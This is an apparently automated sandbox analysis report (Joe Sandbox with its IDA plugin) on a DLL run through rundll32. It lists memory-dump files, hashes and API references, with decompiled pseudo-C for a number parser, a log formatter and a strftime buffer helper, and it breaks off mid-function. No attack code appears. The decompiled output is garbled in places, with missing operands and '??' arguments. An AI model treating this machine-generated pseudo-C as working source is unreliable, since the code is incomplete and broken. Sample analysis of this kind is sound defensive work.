Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_ref$mv_frame_allocmv_frame_freemv_hwframe_get_buffermv_hwframe_mapmv_logmv_mallocmv_mallocz
String ID: Failed to map frame into derived frame context: %d.
API String ID: 2770197599-2491951210
Opcode ID: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
Instruction ID: c8a7df340d6dcafb776f8cd3ae8b96b8e9686aa7a819e798d3a2729e9b2e2ff4
Opcode Fuzzy Hash: 9c42f20b11d269895efbb2d602614c3a18f3d43235624fe558127838406e54b0
Instruction Fuzzy Hash: 6541E5786097418FE740DF29D58095FBBE0FF88350F05896DE8998B355E734E8818B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A720 Relevance: 16.7, APIs: 11, Instructions: 173COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1000A72E
mv_mallocz.F072 ref: 1000A7D5
ReleaseSRWLockExclusive.KERNEL32 ref: 1000A808
mv_mallocz.F072 ref: 1000A890
ReleaseSRWLockExclusive.KERNEL32 ref: 1000A8C4

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$Releasemv_mallocz$Acquire
String ID:
API String ID: 2881747546-0
Opcode ID: e68bda1cf1dcc83a9c629bb4ba2d6cebfd630f8bebdd504c642d2b33e51082ff
Instruction ID: d1cc2579b1c102c58a024c2dc6685eb9d016c090d03debdddd743aed40a40bb7
Opcode Fuzzy Hash: e68bda1cf1dcc83a9c629bb4ba2d6cebfd630f8bebdd504c642d2b33e51082ff
Instruction Fuzzy Hash: 0C6126B49087058FE714DF25C48171BBBE1EF85380F12866DE8998B35ADB74E981CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10092440 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 209
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10092440() {
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				void* _t90;
				signed int _t91;
				void* _t97;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				char* _t129;
				void* _t131;
				signed int* _t132;

				_t132 = _t131 - 0x3c;
				_t125 = _t132[0x14];
				if(_t132[0x15] != 0) {
					_t63 = _t132[0x15];
					 *_t63 = _t125;
				}
				if(_t132[0x16] == 1) {
					L29:
					L100A0678();
					 *_t63 = 0x21;
					goto L30;
				} else {
					if(_t132[0x16] <= 0x24) {
						while(1) {
							_t65 =  *_t125;
							 *_t132 = _t65;
							_t87 = _t65;
							L100A0738();
							if(_t65 == 0) {
								break;
							}
							_t125 = _t125 + 1;
						}
						_t120 = _t87;
						_t88 = _t65;
						_t6 = _t120 - 0x2b; // -43
						_t66 = _t120;
						if((_t6 & 0x000000fd) == 0) {
							_t66 =  *(_t125 + 1) & 0x000000ff;
							_t125 = _t125 + 1;
						}
						if(_t132[0x16] != 0) {
							if(_t132[0x16] != 0x10 || _t66 != 0x30) {
								goto L11;
							} else {
								if(( *(_t125 + 1) & 0xdf) == 0x58) {
									goto L34;
								} else {
									_t132[9] = 0x10;
									_t129 = _t125 + 1;
									_t68 = 0;
									goto L16;
								}
							}
						} else {
							_t132[0x16] = 0xa;
							if(_t66 == 0x30) {
								if(( *(_t125 + 1) & 0xdf) != 0x58) {
									_t132[9] = 8;
									_t132[0x16] = 8;
									goto L45;
								} else {
									L34:
									_t66 =  *(_t125 + 2) & 0x000000ff;
									_t132[0x16] = 0x10;
									_t125 = _t125 + 2;
									goto L11;
								}
							} else {
								L11:
								_t128 = _t66;
								if(_t128 - 0x30 <= 9) {
									_t132[9] = _t132[0x16];
									L45:
									_t68 = _t66 - 0x30;
									goto L15;
								} else {
									 *_t132 = _t128;
									L100A0740();
									if(_t66 != 0) {
										_t68 = _t128 - 0x37;
										_t132[9] = _t132[0x16];
										goto L15;
									} else {
										 *_t132 = _t128;
										L100A0730();
										if(_t66 == 0) {
											L30:
											_t64 = 0;
											goto L31;
										} else {
											_t68 = _t128 - 0x57;
											_t132[9] = _t132[0x16];
											L15:
											_t129 = _t125 + 1;
											if(_t68 >= _t132[9]) {
												goto L30;
											} else {
												L16:
												_t69 = _t132[0x16];
												_t132[0xa] = _t88;
												_t126 = _t68;
												_t132[6] = _t69;
												_t132[7] = _t69 >> 0x1f;
												_t71 = _t120;
												_t121 = _t68 >> 0x1f;
												_t132[0xb] = _t71;
												while(1) {
													_t89 =  *_t129;
													_t35 = _t89 - 0x30; // -96
													_t97 = _t35;
													if(_t97 <= 9) {
														goto L17;
													}
													 *_t132 = _t89;
													L100A0740();
													if(_t71 == 0) {
														 *_t132 = _t89;
														L100A0730();
														if(_t71 != 0) {
															_t90 = _t89 - 0x57;
															goto L18;
														}
													} else {
														_t90 = _t89 - 0x37;
														L18:
														if(_t90 < _t132[9]) {
															 *_t132 = 0xffffffff;
															_t132[1] = 0x7fffffff;
															_t132[2] = _t132[6];
															_t132[3] = _t132[7];
															_t71 = L10091900() + 2;
															asm("adc edx, 0x0");
															asm("sbb edx, edi");
															if(_t71 < _t126) {
																_t132[0xa] = 1;
															} else {
																_t84 = _t126;
																_t71 = _t84 * _t132[0x16];
																_t121 = (_t84 * _t132[0x16] >> 0x20) + _t132[7] * _t126 + _t132[0x16] * _t121;
																_t126 = _t71 + _t90;
																asm("adc edi, ebx");
															}
															_t129 = _t129 + 1;
															continue;
														}
													}
													_t91 = _t132[0xa];
													_t132[7] = _t121;
													_t132[6] = _t126;
													_t122 = _t132[0xb] & 0x000000ff;
													if(_t132[0x15] != 0) {
														 *(_t132[0x15]) = _t129;
													}
													if(_t122 == 0x2d) {
														asm("sbb eax, ebp");
														if(0 < _t132[6] || _t91 != 0) {
															L100A0678();
															 *0x80000000 = 0x22;
															_t64 = 0;
														} else {
															_t64 =  ~(_t132[6]);
															asm("adc edx, 0x0");
														}
														goto L31;
													} else {
														_t64 = _t132[6];
														if(_t132[7] < 0 || _t91 != 0) {
															L100A0678();
															 *_t64 = 0x22;
															return 0xffffffff;
														} else {
															L31:
															return _t64;
														}
													}
													goto L51;
													L17:
													_t90 = _t97;
													goto L18;
												}
											}
										}
									}
								}
							}
						}
					} else {
						goto L29;
					}
				}
				L51:
			}

0x10092444
0x1009244b
0x10092451
0x10092453
0x10092457
0x10092457
0x1009245e
0x100925f0
0x100925f0
0x100925f5
0x00000000
0x10092464
0x10092469
0x10092473
0x10092473
0x10092476
0x10092479
0x1009247b
0x10092482
0x00000000
0x00000000
0x10092470
0x10092470
0x10092484
0x10092486
0x10092488
0x1009248b
0x10092493
0x10092495
0x10092499
0x10092499
0x100924a2
0x100925c5
0x00000000
0x100925d3
0x100925dc
0x00000000
0x100925de
0x100925de
0x100925e6
0x100925e9
0x00000000
0x100925e9
0x100925dc
0x100924a8
0x100924a8
0x100924b2
0x1009262a
0x10092718
0x10092720
0x00000000
0x10092630
0x10092630
0x10092630
0x10092634
0x1009263c
0x00000000
0x1009263c
0x100924b8
0x100924b8
0x100924b8
0x100924c1
0x100926d4
0x100926d8
0x100926db
0x00000000
0x100924c7
0x100924c7
0x100924ca
0x100924d1
0x10092614
0x10092617
0x00000000
0x100924d7
0x100924d7
0x100924da
0x100924e1
0x100925fb
0x100925fb
0x00000000
0x100924e7
0x100924eb
0x100924ee
0x100924f8
0x100924fc
0x10092501
0x00000000
0x10092507
0x10092507
0x1009250b
0x1009250f
0x10092516
0x10092518
0x1009251f
0x10092523
0x10092525
0x10092527
0x1009259a
0x1009259a
0x1009259e
0x1009259e
0x100925a4
0x00000000
0x00000000
0x100925a6
0x100925a9
0x100925b0
0x10092658
0x1009265b
0x10092662
0x100926c0
0x00000000
0x100926c0
0x100925b6
0x100925b6
0x10092532
0x10092538
0x10092546
0x1009254d
0x10092555
0x10092559
0x10092562
0x10092565
0x1009256a
0x1009256c
0x10092648
0x10092572
0x10092582
0x10092584
0x1009258c
0x10092593
0x10092595
0x10092595
0x10092597
0x00000000
0x10092597
0x10092538
0x10092668
0x1009266c
0x10092670
0x10092674
0x1009267b
0x10092681
0x10092681
0x10092687
0x100926f9
0x100926fb
0x10092701
0x1009270b
0x10092711
0x1009272a
0x10092732
0x10092734
0x10092737
0x00000000
0x10092689
0x1009268d
0x10092693
0x1009269d
0x100926a7
0x100926b9
0x100925ff
0x100925ff
0x10092606
0x10092606
0x10092693
0x00000000
0x10092530
0x10092530
0x00000000
0x10092530
0x1009259a
0x10092501
0x100924e1
0x100924d1
0x100924c1
0x100924b2
0x1009246b
0x00000000
0x1009246b
0x10092469
0x00000000

APIs

isspace.MSVCRT ref: 1009247B
isupper.MSVCRT ref: 100924CA
islower.MSVCRT ref: 100924DA
isupper.MSVCRT ref: 100925A9
_errno.MSVCRT ref: 100925F0

Strings

$, xrefs: 10092464

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: isupper$_errnoislowerisspace
String ID: $
API String ID: 4095548146-3993045852
Opcode ID: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
Instruction ID: bf1127f437a700fe79d2786272533d695bbcf864f17e232e7603132a75f37682
Opcode Fuzzy Hash: 86157aabf5dcf11647465d89481f5db1467bac492865d6203d8e1a1173ce975d
Instruction Fuzzy Hash: A171A0746087868FC300CF68C88065EFBE2EFC9394F15492DF8998B791E674D845AB82

Uniqueness

Uniqueness Score: -1.00%

Function 10026169 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E10026169(void* __edi, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, signed char* _a40, signed char* _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
				signed int _t63;
				signed int _t67;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				signed int _t81;
				void* _t84;
				signed char* _t85;
				int _t87;
				signed char* _t88;
				intOrPtr _t92;
				signed char* _t93;
				char* _t102;
				signed char* _t103;
				signed char* _t104;
				signed char* _t105;
				signed char* _t106;
				char* _t107;
				char* _t122;
				signed int _t123;
				char* _t125;
				signed char* _t130;
				signed char** _t132;

				_t130 = __ebp;
				if(( *0x100d76ac & 0x00000002) != 0) {
					_t51 = _a5204 + 8; // 0x101
					__edx = _t51;
					__eax = 0x100b6d3b;
					if(__edx <= 0x40) {
						__eax =  *((intOrPtr*)(0x100b6f40 + __edx * 4));
					}
					_a8 = __eax;
					__eax = "[%s] ";
					_a4 = "[%s] ";
					 *__esp = __edi;
					__eax = L100089C0();
				}
				 *_t132 = _t130;
				_a8 = _a5212;
				_a4 = _a5208;
				L10008B70();
				_t107 = _a1072;
				_t102 = _a2096;
				_t122 = _a3120;
				_t125 = _a4144;
				if( *_t107 != 0 ||  *_t102 != 0 ||  *_t122 != 0 ||  *_t125 != 0) {
					_t92 = _a4148;
					_t63 = 0;
					if(_t92 != 0 && _a4152 >= _t92) {
						_t63 = (0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000a |  *(_t125 + _t92 - 1) & 0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
					}
					 *0x100ad00c = _t63;
				}
				_a24 = _t125;
				_t93 =  &_a48;
				_a8 = "%s%s%s%s";
				_a20 = _t122;
				_a16 = _t102;
				_a12 = _t107;
				_a4 = 0x400;
				 *_t132 = _t93;
				L10025AE0();
				_t67 =  *0x100d76a0;
				if(_t67 == 0) {
					 *_t132 = 2;
					L100A0860();
					asm("sbb eax, eax");
					 *0x100d76a0 = _t67 | 0x00000001;
				}
				_t123 =  *0x100ad00c; // 0x1
				_t126 =  *0x100d7280;
				if(_t123 == 0 || ( *0x100d76ac & 0x00000001) == 0) {
					L12:
					if(_t126 > 0) {
						 *_t132 = 2;
						_t123 = 0;
						_t85 =  *0x100ad0cc();
						_a8 = _t126;
						_t126 = "    Last message repeated %d times\n";
						_a4 = "    Last message repeated %d times\n";
						 *_t132 = _t85;
						E10025610();
						 *0x100d7280 = 0;
					}
					_a4 = _t93;
					 *_t132 = 0x100d72a0;
					strcpy(??, ??);
					_t103 = _a1072;
					_t70 =  *_t103 & 0x000000ff;
					if(_t70 == 0) {
						L20:
						E100257B0(_a40, _t93, _t103, 0, _t123, _t126);
						_t104 = _a2096;
						_t73 =  *_t104 & 0x000000ff;
						if(_t73 == 0) {
							L26:
							E100257B0(_a44, _t93, _t104, 0, _t123, _t126);
							_t105 = _a3120;
							_t76 =  *_t105 & 0x000000ff;
							if(_t76 == 0) {
								L32:
								_t128 = _a36 >> 8;
								_t96 =  >  ? 7 : _a5204 >> 3;
								_t97 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
								E100257B0( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t105, _a36 >> 8, _t123, _a36 >> 8);
								_t106 = _a4144;
								_t81 =  *_t106 & 0x000000ff;
								if(_t81 == 0) {
									L38:
									E100257B0(_t97, _t97, _t106, _t128, _t123, _t128);
									goto L39;
								}
								L34:
								while(_t81 - 0xe > 0x11 && _t81 > 7) {
									_t81 = _t106[1] & 0x000000ff;
									_t106 =  &(_t106[1]);
									if(_t81 != 0) {
										continue;
									}
									L37:
									_t106 = _a4144;
									goto L38;
								}
								 *_t106 = 0x3f;
								_t106 =  &(_t106[1]);
								_t81 =  *_t106 & 0x000000ff;
								if(_t81 != 0) {
									goto L34;
								}
								goto L37;
							}
							L28:
							while(_t76 - 0xe > 0x11 && _t76 > 7) {
								_t76 = _t105[1] & 0x000000ff;
								_t105 =  &(_t105[1]);
								if(_t76 != 0) {
									continue;
								}
								L31:
								_t105 = _a3120;
								goto L32;
							}
							 *_t105 = 0x3f;
							_t105 =  &(_t105[1]);
							_t76 =  *_t105 & 0x000000ff;
							if(_t76 != 0) {
								goto L28;
							}
							goto L31;
						}
						L22:
						while(_t73 - 0xe > 0x11 && _t73 > 7) {
							_t73 = _t104[1] & 0x000000ff;
							_t104 =  &(_t104[1]);
							if(_t73 != 0) {
								continue;
							}
							L25:
							_t104 = _a2096;
							goto L26;
						}
						 *_t104 = 0x3f;
						_t104 =  &(_t104[1]);
						_t73 =  *_t104 & 0x000000ff;
						if(_t73 != 0) {
							goto L22;
						}
						goto L25;
					} else {
						L16:
						while(_t70 - 0xe > 0x11 && _t70 > 7) {
							_t70 = _t103[1] & 0x000000ff;
							_t103 =  &(_t103[1]);
							if(_t70 != 0) {
								continue;
							}
							L19:
							_t103 = _a1072;
							goto L20;
						}
						 *_t103 = 0x3f;
						_t103 =  &(_t103[1]);
						_t70 =  *_t103 & 0x000000ff;
						if(_t70 != 0) {
							goto L16;
						}
						goto L19;
					}
				} else {
					 *_t132 = _t93;
					_t106 = 0x100d72a0;
					_a4 = 0x100d72a0;
					_t87 = strcmp(??, ??);
					if(_t87 != 0) {
						goto L12;
					}
					if(_a48 != 0) {
						 *_t132 = _t93;
						L100A07D8();
						if( *((char*)(_t132 + _t87 + 0x2f)) == 0xd) {
							goto L12;
						}
						_t128 =  &(_t126[1]);
						 *0x100d7280 = _t128;
						if( *0x100d76a0 == 1) {
							 *_t132 = 2;
							_t88 =  *0x100ad0cc();
							_a8 = _t128;
							_a4 = "    Last message repeated %d times\r";
							 *_t132 = _t88;
							E10025610();
						}
						L39:
						 *_t132 = _t130;
						_a4 = 0;
						_t84 = E10009690(0, _t106, _t123, _t128);
						 *_t132 = 0x100d76b0;
						L100A0978();
						return _t84;
					}
					goto L12;
				}
			}

0x10026169
0x10026177
0x10026184
0x10026184
0x10026187
0x1002618f
0x100261be
0x100261be
0x10026191
0x10026195
0x1002619a
0x1002619e
0x100261a1
0x100261a1
0x10025d94
0x10025d9e
0x10025da9
0x10025dad
0x10025db2
0x10025db9
0x10025dc0
0x10025dc7
0x10025dd1
0x10026010
0x10026017
0x1002601b
0x10026039
0x10026039
0x1002603c
0x1002603c
0x10025e00
0x10025e04
0x10025e0d
0x10025e16
0x10025e1a
0x10025e1e
0x10025e22
0x10025e26
0x10025e29
0x10025e2e
0x10025e35
0x100260b0
0x100260b7
0x100260bf
0x100260c4
0x100260c4
0x10025e3b
0x10025e41
0x10025e49
0x10025e80
0x10025e82
0x10025e84
0x10025e8b
0x10025e8d
0x10025e93
0x10025e97
0x10025e9c
0x10025ea0
0x10025ea3
0x10025ea8
0x10025ea8
0x10025eae
0x10025eb2
0x10025eb9
0x10025ebe
0x10025ec5
0x10025eca
0x10025ef6
0x10025efc
0x10025f01
0x10025f08
0x10025f0d
0x10025f36
0x10025f3c
0x10025f41
0x10025f48
0x10025f4d
0x10025f76
0x10025f89
0x10025f8e
0x10025f97
0x10025f9c
0x10025fa1
0x10025fa8
0x10025fad
0x10025fd6
0x10025fda
0x00000000
0x10025fda
0x00000000
0x10025fb0
0x10025fc6
0x10025fca
0x10025fcd
0x00000000
0x00000000
0x10025fcf
0x10025fcf
0x00000000
0x10025fcf
0x10026068
0x1002606b
0x1002606c
0x10026071
0x00000000
0x00000000
0x00000000
0x10026077
0x00000000
0x10025f50
0x10025f66
0x10025f6a
0x10025f6d
0x00000000
0x00000000
0x10025f6f
0x10025f6f
0x00000000
0x10025f6f
0x10026050
0x10026053
0x10026054
0x10026059
0x00000000
0x00000000
0x00000000
0x1002605f
0x00000000
0x10025f10
0x10025f26
0x10025f2a
0x10025f2d
0x00000000
0x00000000
0x10025f2f
0x10025f2f
0x00000000
0x10025f2f
0x10026080
0x10026083
0x10026084
0x10026089
0x00000000
0x00000000
0x00000000
0x10025ed0
0x00000000
0x10025ed0
0x10025ee6
0x10025eea
0x10025eed
0x00000000
0x00000000
0x10025eef
0x10025eef
0x00000000
0x10025eef
0x10026098
0x1002609b
0x1002609c
0x100260a1
0x00000000
0x00000000
0x00000000
0x100260a7
0x10025e54
0x10025e54
0x10025e57
0x10025e5c
0x10025e60
0x10025e67
0x00000000
0x00000000
0x10025e6e
0x100261c7
0x100261ca
0x100261d4
0x00000000
0x00000000
0x100261da
0x100261e2
0x100261e8
0x100261ee
0x100261f5
0x10026200
0x10026204
0x10026208
0x1002620b
0x1002620b
0x10025fdf
0x10025fdf
0x10025fe4
0x10025fe8
0x10025fed
0x10025ff4
0x10026006
0x10026006
0x00000000
0x10025e6e

APIs

mv_vbprintf.F072 ref: 10025DAD
strcmp.MSVCRT ref: 10025E60
strcpy.MSVCRT ref: 10025EB9
mv_bprint_finalize.F072 ref: 10025FE8
ReleaseSRWLockExclusive.KERNEL32 ref: 10025FF4
mv_bprintf.F072 ref: 100261A1

Strings

%s%s%s%s, xrefs: 10025E08
Last message repeated %d times, xrefs: 10025E97
[%s] , xrefs: 10026195

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
String ID: Last message repeated %d times$%s%s%s%s$[%s]
API String ID: 4275616186-1378087399
Opcode ID: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
Instruction ID: d1eb8843b360d500b767063b44c9564666ae391a763e2864b4dfe10f501dd800
Opcode Fuzzy Hash: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
Instruction Fuzzy Hash: B661C0749093C18FD720CF24D8807AABBE2FF85344F85885EE8CA57342D736A945DB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009130 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 272
stringCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E10009130() {
				int _t86;
				void* _t91;
				void* _t93;
				signed char _t99;
				void* _t111;
				signed char _t113;
				void* _t114;
				void* _t118;
				signed char _t119;
				void* _t121;
				int _t122;
				void* _t123;
				unsigned int _t124;
				unsigned int _t125;
				signed int _t126;
				void* _t130;
				void* _t131;
				int _t132;
				void* _t136;
				signed char _t139;
				signed char _t141;
				void* _t142;
				void* _t143;
				signed int _t144;
				int _t145;
				void* _t147;
				signed int _t148;
				signed int _t151;
				int _t153;
				signed int _t154;
				void _t158;
				void* _t159;
				char* _t161;
				void** _t162;
				void* _t165;
				void* _t166;
				void** _t167;
				void*** _t168;

				_t86 = _t168[0x111];
				_t167 = _t168[0x110];
				if( *_t86 == 0) {
					L40:
					return _t86;
				} else {
					_t118 = _t167[2];
					while(1) {
						_t145 = _t167[1];
						_t88 =  <=  ? _t145 : _t118;
						_t121 = _t118 - ( <=  ? _t145 : _t118);
						if(_t121 != 0) {
							goto L15;
						}
						 *_t168 = _t168[0x111];
						_t9 = strlen(??) + 1; // 0x1
						_t159 = _t9;
						L11:
						_t124 = _t167[3];
						if(_t124 == _t118 || _t145 >= _t118) {
							L22:
							_t95 =  <=  ? _t118 : _t145;
							_t119 = _t118 - ( <=  ? _t118 : _t145);
							if(_t119 > 0x3ff) {
								L26:
								_t139 = _t119;
								_t147 =  *_t167 + _t145;
								if(_t119 >= 8) {
									if((_t147 & 0x00000001) != 0) {
										 *_t147 = 0x21;
										_t139 = _t119 - 1;
										_t147 = _t147 + 1;
									}
									if((_t147 & 0x00000002) != 0) {
										 *_t147 = 0x2121;
										_t139 = _t139 - 2;
										_t147 = _t147 + 2;
									}
									if((_t147 & 0x00000004) != 0) {
										 *_t147 = 0x21212121;
										_t139 = _t139 - 4;
										_t147 = _t147 + 4;
									}
									_t125 = _t139;
									_t139 = _t139 & 0x00000003;
									_t126 = _t125 >> 2;
									memset(_t147, 0x21212121, _t126 << 2);
									_t168 =  &(_t168[3]);
									_t147 = _t147 + _t126;
									if((_t139 & 0x00000004) == 0) {
										goto L29;
									} else {
										goto L28;
									}
									goto L40;
								} else {
									if((_t139 & 0x00000004) != 0) {
										L28:
										 *_t147 = 0x21212121;
										_t147 = _t147 + 4;
									}
								}
								L29:
								if((_t139 & 0x00000002) != 0) {
									 *_t147 = 0x2121;
									_t147 = _t147 + 2;
								}
								if((_t139 & 0x00000001) != 0) {
									 *_t147 = 0x21;
								}
								_t161 = "[truncated strftime output]";
								_t99 =  <=  ? _t119 : 0x1b;
								_t141 =  *_t167 + _t167[1];
								if(0x1b >= 4) {
									if((_t141 & 0x00000001) != 0) {
										_t141 = _t141 + 1;
										_t161 = "truncated strftime output]";
										_t99 = _t99 - 1;
										 *((char*)(_t141 - 1)) = "[truncated strftime output]" & 0x000000ff;
									}
									if((_t141 & 0x00000002) != 0) {
										_t148 =  *_t161 & 0x0000ffff;
										_t141 = _t141 + 2;
										_t161 =  &(_t161[2]);
										_t99 = _t99 - 2;
										 *(_t141 - 2) = _t148;
									}
									if(_t99 >= 4) {
										_t168[7] = _t99;
										_t131 = 0;
										_t151 = _t99 & 0xfffffffc;
										do {
											 *(_t141 + _t131) = _t161[_t131];
											_t131 = _t131 + 4;
										} while (_t131 < _t151);
										_t99 = _t168[7];
										_t141 = _t141 + _t131;
										_t161 =  &(_t161[_t131]);
									}
								}
								_t130 = 0;
								if((_t99 & 0x00000002) != 0) {
									_t130 = 2;
									 *_t141 =  *_t161 & 0x0000ffff;
								}
								if((_t99 & 0x00000001) != 0) {
									 *((char*)(_t141 + _t130)) = _t161[_t130] & 0x000000ff;
								}
								_t142 = _t167[1];
								_t102 =  >  ? _t119 : 0xfffffffa - _t142;
								_t86 = ( >  ? _t119 : 0xfffffffa - _t142) + _t142;
								_t136 = _t167[2];
								_t167[1] = 0xfffffffa;
								if(_t136 != 0) {
									L39:
									_t138 =  >  ? _t86 : _t136 - 1;
									_t93 =  *_t167;
									 *((char*)(_t93 + ( >  ? _t86 : _t136 - 1))) = 0;
									return _t93;
								}
								goto L40;
							} else {
								_t162 =  &(_t168[8]);
								 *_t168 = _t162;
								_t168[3] = _t168[0x112];
								_t168[2] = _t168[0x111];
								_t86 = 0x400;
								_t168[1] = 0x400;
								L100A07D0();
								if(0x400 != 0) {
									_t168[2] = _t162;
									_t168[1] = 0x100af500;
									 *_t168 = _t167;
									return L100089C0();
								} else {
									if(_t119 != 0) {
										_t145 = _t167[1];
										goto L26;
									}
									goto L40;
								}
							}
						} else {
							_t110 =  >  ? _t159 : 0xfffffffe - _t145;
							_t111 = _t145 + ( >  ? _t159 : 0xfffffffe - _t145) + 1;
							if(_t124 >> 1 >= _t118) {
								_t118 = _t118 + _t118;
							} else {
								_t118 = _t124;
							}
							if(_t118 < _t111) {
								_t115 =  <=  ? _t124 : _t111;
								_t118 =  <=  ? _t124 : _t111;
							}
							_t165 =  *_t167;
							_t168[1] = _t118;
							if(_t165 ==  &(_t167[4])) {
								 *_t168 = 0;
								_t113 = L10028DA0();
								if(_t113 == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								 *_t168 = _t165;
								_t113 = L10028DA0();
								if(_t113 == 0) {
									L21:
									_t118 = _t167[2];
									_t145 = _t167[1];
									goto L22;
								} else {
									if(_t165 == 0) {
										L19:
										_t153 = _t167[1];
										_t143 = _t113;
										_t166 =  *_t167;
										_t132 = _t153 + 1;
										_t168[7] = _t166;
										if(_t132 >= 8) {
											if((_t113 & 0x00000001) != 0) {
												_t144 =  *_t166 & 0x000000ff;
												_t132 = _t153;
												_t166 = _t166 + 1;
												 *_t113 = _t144;
												_t82 = _t113 + 1; // 0x1
												_t143 = _t82;
											}
											if((_t143 & 0x00000002) != 0) {
												_t154 =  *_t166 & 0x0000ffff;
												_t143 = _t143 + 2;
												_t166 = _t166 + 2;
												_t132 = _t132 - 2;
												 *(_t143 - 2) = _t154;
											}
											if((_t143 & 0x00000004) != 0) {
												_t158 =  *_t166;
												_t143 = _t143 + 4;
												_t166 = _t166 + 4;
												_t132 = _t132 - 4;
												 *(_t143 - 4) = _t158;
											}
										}
										_t114 = memcpy(_t143, _t166, _t132);
										_t168 =  &(_t168[3]);
									}
									 *_t167 = _t114;
									_t167[2] = _t118;
									continue;
								}
							}
						}
						goto L66;
						L15:
						_t168[1] = _t121;
						_t168[7] = _t121;
						_t168[3] = _t168[0x112];
						_t168[2] = _t168[0x111];
						_t91 =  *_t167;
						 *_t168 = _t91 + _t145;
						L100A07D0();
						if(_t91 != 0) {
							_t122 = _t167[1];
